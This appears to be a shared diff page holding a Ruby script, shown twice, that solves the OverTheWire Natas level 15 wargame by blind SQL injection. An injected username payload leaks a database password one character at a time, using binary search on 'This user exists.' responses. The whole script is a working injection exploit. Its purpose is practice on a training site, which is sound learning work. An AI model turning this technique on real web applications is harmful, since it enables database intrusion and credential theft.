dlanner · August 29, 2015 13:58
diff --git a/blind_sqli.rb b/blind_sqli.rb
 # Blind SQL injection script for Natas CTF Level 15
 # http://natas15.natas.labs.overthewire.org/

 require 'net/http'

 # Returns true if the ASCII value of the ith character of the password is less than the ASCII value passed in, otherwise false
 # Uses blind SQL injection
 # Example:
 # compare 1, 85
 # This returns true if the ASCII value of the password's first character is less than 85, otherwise false.
 def compare i, char_code
  uri = URI("http://natas15.natas.labs.overthewire.org/")
  query = {
    "username" => "natas16\" and ascii(substring((select concat(password) from users where username='natas16' limit 0,1),#{i},1))<#{char_code}-- ",
    "debug" => true
  }
  uri.query = URI.encode_www_form( query )
  req = Net::HTTP::Get.new(uri)
  req.basic_auth 'natas15', '!!_HASH_FROM_PREVIOUS_LEVEL_GOES_HERE_!!'
  res = Net::HTTP.start(uri.hostname, uri.port) { |http|
    http.request(req)
  }
  res.body.include? "This user exists."
 end

 # Find the ith character of the password using binary search
 def search i, lower_bound, upper_bound
  puts "Searching for character ##{i} in [#{lower_bound.chr} (#{lower_bound})..#{upper_bound.chr} (#{upper_bound})]"
  if upper_bound == lower_bound + 1
    return lower_bound
  end
  middle = (lower_bound + upper_bound) / 2
  if compare i, middle
    search i, lower_bound, middle
  else
    search i, middle, upper_bound
  end
 end

 def nth_letter i
  lower_bound = '0'.ord
  upper_bound = 'z'.ord
  search i, lower_bound, upper_bound
 end

 # Brute force password using blind SQL injection
 def find_password start_at=1, end_at=32
  password = ""
  (start_at..end_at).each do |i|
    letter = nth_letter(i).chr
    puts "#{i}: #{letter}"
    password << letter
  end
  puts "password: #{password}"
 end
	# Blind SQL injection script for Natas CTF Level 15
	# http://natas15.natas.labs.overthewire.org/

	require 'net/http'

	# Returns true if the ASCII value of the ith character of the password is less than the ASCII value passed in, otherwise false
	# Uses blind SQL injection
	# Example:
	# compare 1, 85
	# This returns true if the ASCII value of the password's first character is less than 85, otherwise false.
	def compare i, char_code
	uri = URI("http://natas15.natas.labs.overthewire.org/")
	query = {
	"username" => "natas16\" and ascii(substring((select concat(password) from users where username='natas16' limit 0,1),#{i},1))<#{char_code}-- ",
	"debug" => true
	}
	uri.query = URI.encode_www_form( query )
	req = Net::HTTP::Get.new(uri)
	req.basic_auth 'natas15', '!!_HASH_FROM_PREVIOUS_LEVEL_GOES_HERE_!!'
	res = Net::HTTP.start(uri.hostname, uri.port) { \|http\|
	http.request(req)
	}
	res.body.include? "This user exists."
	end

	# Find the ith character of the password using binary search
	def search i, lower_bound, upper_bound
	puts "Searching for character ##{i} in [#{lower_bound.chr} (#{lower_bound})..#{upper_bound.chr} (#{upper_bound})]"
	if upper_bound == lower_bound + 1
	return lower_bound
	end
	middle = (lower_bound + upper_bound) / 2
	if compare i, middle
	search i, lower_bound, middle
	else
	search i, middle, upper_bound
	end
	end

	def nth_letter i
	lower_bound = '0'.ord
	upper_bound = 'z'.ord
	search i, lower_bound, upper_bound
	end

	# Brute force password using blind SQL injection
	def find_password start_at=1, end_at=32
	password = ""
	(start_at..end_at).each do \|i\|
	letter = nth_letter(i).chr
	puts "#{i}: #{letter}"
	password << letter
	end
	puts "password: #{password}"
	end
No results found